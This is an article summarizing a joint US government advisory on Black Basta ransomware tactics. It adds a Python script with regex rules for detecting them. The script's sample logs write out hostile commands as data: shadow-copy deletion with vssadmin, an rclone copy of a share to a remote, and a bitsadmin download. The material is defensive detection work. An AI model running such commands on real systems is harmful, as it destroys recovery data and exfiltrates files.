Black Basta is a ransomware variant whose actors have targeted over 500 private industry organizations and have encrypted and stolen data from at least 12 of the 16 critical infrastructure sectors.

In response, the Cybersecurity and Infrastructure Security Agency (CISA), in partnership with the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), released a joint Cybersecurity Advisory (CSA) entitled #StopRansomware: Black Basta.

This joint CSA provides TTPs and IoCs obtained from FBI investigations and third-party reporting. Black Basta is a ransomware-as-a-service (RaaS) variant and was first identified in April 2022.

Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia.

Black Basta affiliates use common initial access techniques, such as phishing and exploiting known vulnerabilities, and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instruct them to contact the ransomware group via a .onion URL (reachable through the Tor browser). Typically, the ransom notes give victims between 10 and 12 days to pay the ransom before the ransomware group publishes their data on the Black Basta Tor site, Basta News.

Schneider Bold

Black Basta affiliates primarily use spear phishing to obtain initial access. According to cybersecurity researchers, affiliates have also used Qakbot during initial access.

Starting in February 2024, Black Basta affiliates began exploiting a ConnectWise vulnerability. In some instances, affiliates have been observed abusing valid credentials.

Black Basta affiliates use tools such as SoftPerfect network scanner (netscan.exe) to conduct network scanning. Cybersecurity researchers have observed affiliates conducting reconnaissance using utilities with innocuous file names such as Intel or Dell, left in the root drive C:\.

Black Basta affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol (RDP), for lateral movement. Some affiliates also use tools like Splashtop, ScreenConnect, and Cobalt Strike beacons to assist with remote access and lateral movement.

Black Basta affiliates use credential scraping tools like Mimikatz for privilege escalation. According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon, NoPac and PrintNightmare vulnerabilities for local and Windows Active Domain privilege escalation.

Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. Before exfiltration, cybersecurity researchers observed Black Basta affiliates using PowerShell to disable antivirus products and, in some instances, deploying a tool called Backstab, designed to disable endpoint detection and response (EDR) tooling. Once antivirus programs are terminated, the ransomware fully encrypts files with the ChaCha20 algorithm, using an RSA-4096 public key. A .basta or otherwise random file extension is appended to file names, and a ransom note titled readme.txt is left on the compromised system. To further inhibit system recovery, affiliates use the vssadmin.exe program to delete volume shadow copies.
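The TTPs listed above (netscan.exe, innocuously named binaries in C:\, PsExec and BITSAdmin, RClone, vssadmin.exe shadow-copy deletion, the .basta extension and the readme.txt note pointing at a .onion URL) are all visible on a host as process command lines and file names. As an added example, not code from the advisory or from this article, the Python below runs simple detection rules over constructed process-creation log lines and file names. The log format, field names, regex patterns, host/user names and sample lines are all assumptions made for the example.

```python
"""Added detection example for the Black Basta TTPs named in the advisory.
The log line format (ts host= user= image= cmd="...") and every sample
value below are constructed for this example, not taken from real telemetry."""
import re
from dataclasses import dataclass

# One rule per advisory-listed TTP; patterns are assumed, not from the CSA.
# Rules are matched against "<image path> <command line>" of a process-creation event.
RULES = {
    "shadow_copy_deletion": re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I),
    "network_scan_netscan": re.compile(r"\bnetscan\.exe\b", re.I),
    "rclone_exfiltration": re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I),
    "psexec_lateral_movement": re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I),
    "bitsadmin_transfer": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I),
    # Binaries named Intel or Dell sitting directly in the root of a drive.
    "innocuous_name_in_root": re.compile(r'(?:^|\s)"?[a-z]:\\(intel|dell)[^\\\s]*\.exe\b', re.I),
}

# Assumed log line shape: ts host=H user=U image=PATH cmd="COMMAND LINE"
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
    r'image=(?P<image>\S+)\s+cmd="(?P<cmd>.*)"$'
)

@dataclass
class Hit:
    ts: str
    host: str
    user: str
    rule: str
    cmd: str

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in the assumed format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def scan_process_logs(lines):
    """Apply every rule to each parsable line; one Hit per (line, rule) match."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        haystack = f'{rec["image"]} {rec["cmd"]}'
        for name, pattern in RULES.items():
            if pattern.search(haystack):
                hits.append(Hit(rec["ts"], rec["host"], rec["user"], name, rec["cmd"]))
    return hits

def summarize(hits):
    """Count hits per rule, for a quick triage view."""
    counts = {}
    for h in hits:
        counts[h.rule] = counts.get(h.rule, 0) + 1
    return counts

# Tor v2/v3 onion hostnames are base32, 16 or 56 characters.
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.I)

def looks_like_basta_note(filename, text):
    """The advisory describes a readme.txt note that directs victims to a .onion URL."""
    return filename.lower() == "readme.txt" and ONION_RE.search(text) is not None

def has_basta_extension(path):
    """Encrypted files get a .basta extension appended (other random extensions also occur)."""
    return path.lower().endswith(".basta")

# Constructed sample events: the first is benign, the rest each trip one rule.
SAMPLE_LOGS = [
    r'2024-05-10T12:00:01Z host=WS01 user=CORP\jdoe image=C:\Windows\System32\cmd.exe cmd="cmd.exe /c dir"',
    r'2024-05-10T12:01:05Z host=WS01 user=CORP\jdoe image=C:\Intel.exe cmd="C:\Intel.exe"',
    r'2024-05-10T12:02:10Z host=WS01 user=CORP\jdoe image=C:\Tools\netscan.exe cmd="netscan.exe /range:10.0.0.1-10.0.0.254"',
    r'2024-05-10T12:10:30Z host=WS01 user=CORP\jdoe image=C:\Tools\PsExec64.exe cmd="PsExec64.exe \\SRV02 cmd.exe"',
    r'2024-05-10T12:11:00Z host=SRV02 user=CORP\svc image=C:\Windows\System32\bitsadmin.exe cmd="bitsadmin.exe /transfer job1 http://example.invalid/a.bin C:\a.bin"',
    r'2024-05-10T13:20:00Z host=SRV02 user=CORP\svc image=C:\Users\svc\rclone.exe cmd="rclone.exe copy C:\Share remote:backup"',
    r'2024-05-10T13:45:00Z host=SRV02 user=CORP\svc image=C:\Windows\System32\vssadmin.exe cmd="vssadmin.exe delete shadows /all /quiet"',
]

# Constructed note text and file name, purely to exercise the two file checks.
SAMPLE_NOTE = "Your company id: EXAMPLE-0000\nContact: http://exampleexampleexample.onion/ (constructed)"

if __name__ == "__main__":
    for h in scan_process_logs(SAMPLE_LOGS):
        print(f"{h.ts} {h.host} {h.user} [{h.rule}] {h.cmd}")
    print(summarize(scan_process_logs(SAMPLE_LOGS)))
    print(looks_like_basta_note("readme.txt", SAMPLE_NOTE), has_basta_extension("Q2-report.xlsx.basta"))
```

The rules deliberately key on command lines rather than file hashes, because affiliates rename tools (the Intel/Dell example above) and rebuild them, while the behaviour (deleting shadow copies, copying a share to a remote with rclone) is harder to hide. Any single rule will fire on legitimate admin activity; the useful signal is several of them on one host within a short window.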

Click here to read more of the Black Basta CSA.
